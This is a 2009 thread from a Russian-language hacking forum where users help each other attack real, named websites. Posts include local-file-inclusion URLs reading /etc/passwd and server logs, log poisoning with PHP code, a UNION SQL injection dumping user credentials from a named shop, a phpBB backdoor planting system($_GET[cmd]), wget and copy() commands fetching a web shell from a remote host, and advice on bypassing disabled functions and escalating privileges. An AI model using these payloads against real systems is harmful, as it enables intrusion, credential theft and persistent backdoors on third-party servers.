Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. nub-hacker

    nub-hacker Banned

    Joined:
    23 Jun 2009
    Messages:
    69
    Likes Received:
    5
    Reputations:
    -10
    Помогите пожлауйста найти httpd.conf на этом инклуде

    http://www.pubertaetverstehen.ch/index.php?pageid=../../../../../../../../../etc/passwd%00
     
  2. DimOnOID

    DimOnOID Banned

    Joined:
    5 Dec 2006
    Messages:
    407
    Likes Received:
    126
    Reputations:
    4
    Code:
    http://www.pubertaetverstehen.ch/index.php?pageid=/var/log/httpd-access.log%00
    217.26.52.37 отсюда логирует...
    ;)
     
    2 people like this.
  3. nub-hacker

    nub-hacker Banned

    Joined:
    23 Jun 2009
    Messages:
    69
    Likes Received:
    5
    Reputations:
    -10

    спс, поставте ему +5.

    ЗЫ плиз, не лейте шелл до меня, пожалуйста =)
     
  4. nub-hacker

    nub-hacker Banned

    Joined:
    23 Jun 2009
    Messages:
    69
    Likes Received:
    5
    Reputations:
    -10
    Ещё вопрос.
    http://www.mfa.gov.et/View_Commentaries/View.php?Page=../../../../../../var/log/httpd-access.log

    вот лог. Что надо вписаь в инеткряк чтобы оставить запись в этом или еррор логе

    =================
    Вот ещё:

    http://www.saminfo.ru/~dmitrypg/index.php?pgid=Co&pgextra=../../../../../../../../../../../../var/log/httpd-access.log

    но мне опять не везёт. php код не выполняется =(

    вот запись [29/Jun/2009:12:57:15 +0500] "GET / HTTP/1.1" 200 1456 "-" "<? phpinfo(); ?>"
     
    #7784 nub-hacker, 29 Jun 2009
    Last edited: 29 Jun 2009
  5. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    http://www.saminfo.ru/~dmitrypg/index.php?pgid=Co&pgextra=это%20не%20инклуд

    Warning: fopen(articles/это не инклуд):
     
    1 person likes this.
  6. diznt

    diznt Elder - Старейшина

    Joined:
    31 Jan 2008
    Messages:
    432
    Likes Received:
    164
    Reputations:
    -19
    PHP:
    function CheckExt($filename$ext)
    {
        
    $name strtolower($filename);
        if(
    substr($namestrlen($name) -33) == $ext)
            return 
    true;
        else
            return 
    false;
    }
    Этот скрипт уязвим?(он проверяет расш. файла при заливке) Вот что я пытался сделать...
    Поскоку скрипт проверяет токо название файла (что за расширение стоит в конце) то я попробывал залить gif а в гифе в конце файла (после ";" (без ковычек)) подставить это

    PHP:
    <html><script>alert(//)</script></html>
    Подставил... Зашел через IE(картинка битая была при просмотре), в итоге алерта нету! В чем дело?
     
  7. nub-hacker

    nub-hacker Banned

    Joined:
    23 Jun 2009
    Messages:
    69
    Likes Received:
    5
    Reputations:
    -10
    Спс, jokester. А есть ли скрипт который сам проверят на дефолтные пути к конфигам и логам? в одной теме где дефолтные пути там есть атач от Elekt. Но архив битый, не открывается. Может гдето ещё есть?

    ЗЫ можно в дальнеёшем просто joker?
     
  8. Damned_one

    Damned_one Member

    Joined:
    24 Nov 2008
    Messages:
    12
    Likes Received:
    11
    Reputations:
    5
    Есть вопрос по Xss уязвимостям: если фильтр фильтрует(ой..) \ заменяя его на html код
    PHP:
    (c semicolons) так вот... возможно ли как то обойти эту фильтрацию?
     
    #7788 Damned_one, 29 Jun 2009
    Last edited: 29 Jun 2009
  9. magichire

    magichire New Member

    Joined:
    30 Apr 2009
    Messages:
    17
    Likes Received:
    1
    Reputations:
    0
    Залил вебшелл, но у него права nobody, соответственно сильно не разгуляешься (интересует редактирование файлов). Можно ли как то получить права хотя бы юзверя в папку которого залит шелл, кроме как рутать сервак?

    Система Freeebsd 6.2.
     
  10. AlexSatter

    AlexSatter Member

    Joined:
    29 Jan 2009
    Messages:
    303
    Likes Received:
    92
    Reputations:
    33
    нужно искать сплоиты, для конкретной версии ядра, в данном случае 6.2, либо попробовать поискать баги в установленной версии веб сервера...
    например тут: milw0rm.com
     
  11. geezer.code

    geezer.code Elder - Старейшина

    Joined:
    22 Jan 2007
    Messages:
    552
    Likes Received:
    358
    Reputations:
    90
    Вроде нет сплоита под 6ку, по крайней мере в паблике.
    Можно поискать сплоиты под сервисы, например sendmail.
     
  12. AlexSatter

    AlexSatter Member

    Joined:
    29 Jan 2009
    Messages:
    303
    Likes Received:
    92
    Reputations:
    33
    FreeBSD 6x/7x
    http://milw0rm.com/exploits/7581
     
  13. bons

    bons Elder - Старейшина

    Joined:
    20 Dec 2007
    Messages:
    286
    Likes Received:
    121
    Reputations:
    21
    там рядом есть инъекция проще
    Code:
    http://regina.kz/shop/podrobno.php?CID=999&id=-1+union+select+1,2,username,4,5,6,7,password+from+mos_users+limit+0,1--
     
    #7793 bons, 30 Jun 2009
    Last edited: 30 Jun 2009
  14. bons

    bons Elder - Старейшина

    Joined:
    20 Dec 2007
    Messages:
    286
    Likes Received:
    121
    Reputations:
    21
    полагаю так же как и ты, через ORDER BY, см
    https://forum.antichat.ru/thread19844.html
     
  15. Vish

    Vish Banned

    Joined:
    12 Jun 2009
    Messages:
    8
    Likes Received:
    1
    Reputations:
    0
    Получил я админский акк от булки, залил шелл и мне вылетела не приятная надпись:
    Warning: shell_exec() has been disabled for security reasons in /faq.php(302) : eval()'d code(2) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code on line 361

    Пробовал проинклудить, тож ни чего не получилось, всё отключено, system() тоже...

    Есть ли в такой ситуации возможность просмотреть конфиг ?
     
  16. geezer.code

    geezer.code Elder - Старейшина

    Joined:
    22 Jan 2007
    Messages:
    552
    Likes Received:
    358
    Reputations:
    90
    1 залить другой шелл на пхп
    2 залить шелл на другом языке, например на перле
    3 покурить тему safe_mode bypass. есть даже видео от BlackSun
    4 если надо только прочесть файл, то не обязательно иметь полноценный шелл с исполнение команд, можно просто сделать fopen. главное чтобы прав хватило.
     
  17. slider

    slider Reservists Of Antichat

    Joined:
    4 Sep 2005
    Messages:
    501
    Likes Received:
    711
    Reputations:
    748
    passthru(); ну или fopen(); copy();
     
  18. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    phpinfo();
    если в нём allow_url_fopen=on, делай copy('http:///ww.site.com/shell.txt','/tmp/shell.php');
    потом инклудишь его
    если off, смотриш на сейф мод, на дизейбл функшнс, там уже по обстоятельствам
     
  19. +++AndreyDevil+++

    Joined:
    28 Dec 2008
    Messages:
    117
    Likes Received:
    30
    Reputations:
    0
    Залил шелл через phpbb, с помощью востановления базы.......
    PHP:
    UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0'user_sig='phpbb:system($_GET[cmd])' WHERE user_id=2;
    Пытаюсь залить madshell в папку /var/www/images/ (права есть).....
    делаю так,
    PHP:
    http://site.com/forum/profile.php?mode=editprofile&cmd=wget%20http://host.com/papka/shell.php%20-o%20/var/www/images/tyrytrytr.php
    файл создался, но в ответ при открытие я получаю,
    Code:
    --17:50:03-- http://host.com/papka/shell.php => `shell.php' Resolving host.com... xx.xx.xx.xx Connecting to host.com[xx.xx.xx.xx]:80... failed: Connection timed out.
    -------------------
    Почему так???Что такое??
     
  20. nemaniak

    nemaniak Elder - Старейшина

    Joined:
    10 Jun 2008
    Messages:
    195
    Likes Received:
    161
    Reputations:
    108
    Время подключения к хосту превышено, попробуй воспользоваться шеллом с другого сайта
     
Thread Status:
Not open for further replies.